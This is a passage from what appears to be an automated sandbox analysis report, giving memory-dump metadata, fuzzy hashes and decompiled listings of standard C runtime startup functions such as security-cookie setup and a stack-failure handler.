                                                                                                                                                                                              • Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b30000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 836923961-0
                                                                                                                                                                                              • Opcode ID: 3c177e5907a6277f8ba72b1f2a5fae1ccb80fc1381006866f66d0996f5b46496
                                                                                                                                                                                              • Instruction ID: b63a7353c4b68e2399c2e5e8d4e22aa484b28290933524888d3f93923be2bd82
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c177e5907a6277f8ba72b1f2a5fae1ccb80fc1381006866f66d0996f5b46496
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A411635A45724DFDB258B5CD95536E77FCEB04B22F3049AAE851A73A0CF708E4187A0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000003.222316903.0000000006B90000.00000010.00000001.sdmp, Offset: 06B90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_3_6b90000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: be2cfd8b987d6f027ea48c35dc590bac23dd0f26fb8dc0e48c0de3deecf971ab
                                                                                                                                                                                              • Instruction ID: 18f70418b687cd8409365cced87e5f06e77d5e5e07c9b1a5460b42db1196bb40
                                                                                                                                                                                              • Opcode Fuzzy Hash: be2cfd8b987d6f027ea48c35dc590bac23dd0f26fb8dc0e48c0de3deecf971ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: CAB1E3B8E047458FEF84EF98D880A6EF7F6FF88308F1085A9D95667241D7705891CBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000003.222338089.0000000006590000.00000010.00000001.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_3_6590000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                              • Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000003.222338089.0000000006590000.00000010.00000001.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_3_6590000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                              • Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000003.222338089.0000000006590000.00000010.00000001.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_3_6590000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                              • Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000003.222338089.0000000006590000.00000010.00000001.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_3_6590000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                              • Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 154 b31dc3-b31de6 155 b31de8-b31dea 154->155 156 b31dec-b31e39 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 154->156 155->156 157 b31e50-b31e5c 155->157 158 b31e43-b31e48 156->158 159 b31e3b-b31e41 156->159 160 b31e4a 158->160 159->158 159->160 160->157
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00B31DC3() {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				struct _FILETIME _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				union _LARGE_INTEGER _v24;
                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                              				_t23 =  *0xb33004;
                                                                                                                                                                                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                              					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                              					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                              					_t39 = _t36;
                                                                                                                                                                                              					if(_t36 == 0xbb40e64e || ( *0xb33004 & 0xffff0000) == 0) {
                                                                                                                                                                                              						_t36 = 0xbb40e64f;
                                                                                                                                                                                              						_t39 = 0xbb40e64f;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *0xb33004 = _t39;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t37 =  !_t36;
                                                                                                                                                                                              				 *0xb33008 = _t37;
                                                                                                                                                                                              				return _t37;
                                                                                                                                                                                              			}











                                                                                                                                                                                              0x00b31dcb
                                                                                                                                                                                              0x00b31dcf
                                                                                                                                                                                              0x00b31dd3
                                                                                                                                                                                              0x00b31de6
                                                                                                                                                                                              0x00b31df0
                                                                                                                                                                                              0x00b31dfc
                                                                                                                                                                                              0x00b31e05
                                                                                                                                                                                              0x00b31e0e
                                                                                                                                                                                              0x00b31e1f
                                                                                                                                                                                              0x00b31e26
                                                                                                                                                                                              0x00b31e32
                                                                                                                                                                                              0x00b31e35
                                                                                                                                                                                              0x00b31e39
                                                                                                                                                                                              0x00b31e43
                                                                                                                                                                                              0x00b31e48
                                                                                                                                                                                              0x00b31e48
                                                                                                                                                                                              0x00b31e4a
                                                                                                                                                                                              0x00b31e4a
                                                                                                                                                                                              0x00b31e50
                                                                                                                                                                                              0x00b31e53
                                                                                                                                                                                              0x00b31e5c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B31DF0
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00B31DFF
                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00B31E08
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00B31E11
                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00B31E26
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b30000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                                                                              • Opcode ID: 27aaace952ce5197f2a6c511c54c0974e0463c19e34ce6a67d0d3e3f07009f59
                                                                                                                                                                                              • Instruction ID: 8775afecb0aa19943d5c0ec544985b8c22b3441758380b6a0f50ab46a462aa2a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 27aaace952ce5197f2a6c511c54c0974e0463c19e34ce6a67d0d3e3f07009f59
                                                                                                                                                                                              • Instruction Fuzzy Hash: D6111C75E01218EBCB14DBB8DA5869EBBF8EF48311F6148A6E905E7210DB309B408B50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00B31F11(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                              
                                                                                                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                              				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                              			}



                                                                                                                                                                                              0x00b31f18
                                                                                                                                                                                              0x00b31f21
                                                                                                                                                                                              0x00b31f3a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B32047,00B31000), ref: 00B31F18
                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00B32047,?,00B32047,00B31000), ref: 00B31F21
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,00B32047,00B31000), ref: 00B31F2C
                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00B32047,00B31000), ref: 00B31F33
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b30000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                              • Opcode ID: 5ed3e495111bde6076109760af6f3f3aa33dd8710e8fb656f3e66c90acb8bd05
                                                                                                                                                                                              • Instruction ID: 9ee998329ac382e79394d717cda4f02227c1437ca0b600da4c19cc20fe90fdfd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ed3e495111bde6076109760af6f3f3aa33dd8710e8fb656f3e66c90acb8bd05
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71D0CA32604208BBCB092BE2EE0CA5D3F28EB88212F240000F30A830A0CF35A8018B65
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 135 b31800-b3180c 136 b31812-b31822 135->136 137 b3180e-b31810 135->137 136->137 139 b31824-b31830 136->139 138 b31860-b31862 137->138 140 b31867 call b31c3e 138->140 141 b31832-b31837 139->141 142 b3184c-b31855 139->142 144 b3186c-b318ab __set_app_type __p__fmode __p__commode call b31e60 140->144 141->137 145 b31839-b31842 141->145 142->138 143 b31857 142->143 146 b3185d 143->146 150 b318b9-b318c0 call b31e63 144->150 151 b318ad-b318b8 __setusermatherr 144->151 145->138 148 b31844-b3184a 145->148 146->138 148->146 151->150
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00B31800() {
                                                                                                                                                                                              				signed int _t10;
                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                              				signed int _t18;
                                                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t25 =  *0xb30000 - 0x5a4d; // 0x5a4d
                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                              					_t19 =  *0xb3003c; // 0xe8
                                                                                                                                                                                              					__eflags =  *((intOrPtr*)(_t19 + 0xb30000)) - 0x4550;
                                                                                                                                                                                              					if( *((intOrPtr*)(_t19 + 0xb30000)) != 0x4550) {
                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t2 = _t19 + 0xb30018; // 0xc0e010b
                                                                                                                                                                                              						_t18 =  *_t2 & 0x0000ffff;
                                                                                                                                                                                              						__eflags = _t18 - 0x10b;
                                                                                                                                                                                              						if(_t18 == 0x10b) {
                                                                                                                                                                                              							_t10 = 0;
                                                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t19 + 0xb30074)) - 0xe;
                                                                                                                                                                                              							if( *((intOrPtr*)(_t19 + 0xb30074)) > 0xe) {
                                                                                                                                                                                              								__eflags =  *(_t19 + 0xb300e8);
                                                                                                                                                                                              								goto L9;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							__eflags = _t18 - 0x20b;
                                                                                                                                                                                              							if(_t18 != 0x20b) {
                                                                                                                                                                                              								goto L1;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t10 = 0;
                                                                                                                                                                                              								__eflags =  *((intOrPtr*)(_t19 + 0xb30084)) - 0xe;
                                                                                                                                                                                              								if( *((intOrPtr*)(_t19 + 0xb30084)) > 0xe) {
                                                                                                                                                                                              									__eflags =  *(_t19 + 0xb300f8);
                                                                                                                                                                                              									L9:
                                                                                                                                                                                              									_t8 = __eflags != 0;
                                                                                                                                                                                              									__eflags = _t8;
                                                                                                                                                                                              									_t10 = _t10 & 0xffffff00 | _t8;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					L1:
                                                                                                                                                                                              					_t10 = 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *0xb33028 = _t10;
                                                                                                                                                                                              				__set_app_type(E00B31C3E(2));
                                                                                                                                                                                              				 *0xb33404 =  *0xb33404 | 0xffffffff;
                                                                                                                                                                                              				 *0xb33408 =  *0xb33408 | 0xffffffff;
                                                                                                                                                                                              				 *(__p__fmode()) =  *0xb3303c;
                                                                                                                                                                                              				 *(__p__commode()) =  *0xb33030;
                                                                                                                                                                                              				_t15 = E00B31E60();
                                                                                                                                                                                              				if( *0xb33000 == 0) {
                                                                                                                                                                                              					__setusermatherr(E00B31E60);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E00B31E63(_t15);
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}








                                                                                                                                                                                              0x00b31805
                                                                                                                                                                                              0x00b3180c
                                                                                                                                                                                              0x00b31812
                                                                                                                                                                                              0x00b31818
                                                                                                                                                                                              0x00b31822
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31824
                                                                                                                                                                                              0x00b31824
                                                                                                                                                                                              0x00b31824
                                                                                                                                                                                              0x00b3182b
                                                                                                                                                                                              0x00b31830
                                                                                                                                                                                              0x00b3184c
                                                                                                                                                                                              0x00b3184e
                                                                                                                                                                                              0x00b31855
                                                                                                                                                                                              0x00b31857
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31857
                                                                                                                                                                                              0x00b31832
                                                                                                                                                                                              0x00b31832
                                                                                                                                                                                              0x00b31837
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31839
                                                                                                                                                                                              0x00b31839
                                                                                                                                                                                              0x00b3183b
                                                                                                                                                                                              0x00b31842
                                                                                                                                                                                              0x00b31844
                                                                                                                                                                                              0x00b3185d
                                                                                                                                                                                              0x00b3185d
                                                                                                                                                                                              0x00b3185d
                                                                                                                                                                                              0x00b3185d
                                                                                                                                                                                              0x00b3185d
                                                                                                                                                                                              0x00b31842
                                                                                                                                                                                              0x00b31837
                                                                                                                                                                                              0x00b31830
                                                                                                                                                                                              0x00b3180e
                                                                                                                                                                                              0x00b3180e
                                                                                                                                                                                              0x00b3180e
                                                                                                                                                                                              0x00b3180e
                                                                                                                                                                                              0x00b31862
                                                                                                                                                                                              0x00b3186d
                                                                                                                                                                                              0x00b31873
                                                                                                                                                                                              0x00b3187a
                                                                                                                                                                                              0x00b3188f
                                                                                                                                                                                              0x00b3189d
                                                                                                                                                                                              0x00b3189f
                                                                                                                                                                                              0x00b318ab
                                                                                                                                                                                              0x00b318b2
                                                                                                                                                                                              0x00b318b8
                                                                                                                                                                                              0x00b318b9
                                                                                                                                                                                              0x00b318c0

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b30000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                              • String ID: .$
                                                                                                                                                                                              • API String ID: 1063105408-2223841709
                                                                                                                                                                                              • Opcode ID: da0426f94d9aedacaebb3f1ad0b00c42b68b6e1c2d4523bfc8b66735839edf9a
                                                                                                                                                                                              • Instruction ID: e4cf75923a952ffb20debefb99acd38af4ad19fb08b507f422c56da8460c4165
                                                                                                                                                                                              • Opcode Fuzzy Hash: da0426f94d9aedacaebb3f1ad0b00c42b68b6e1c2d4523bfc8b66735839edf9a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 11117330A10308DFD728AB38E99C21936E9EF00766F314DA9D515CB1E1DF3A9581CB18
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%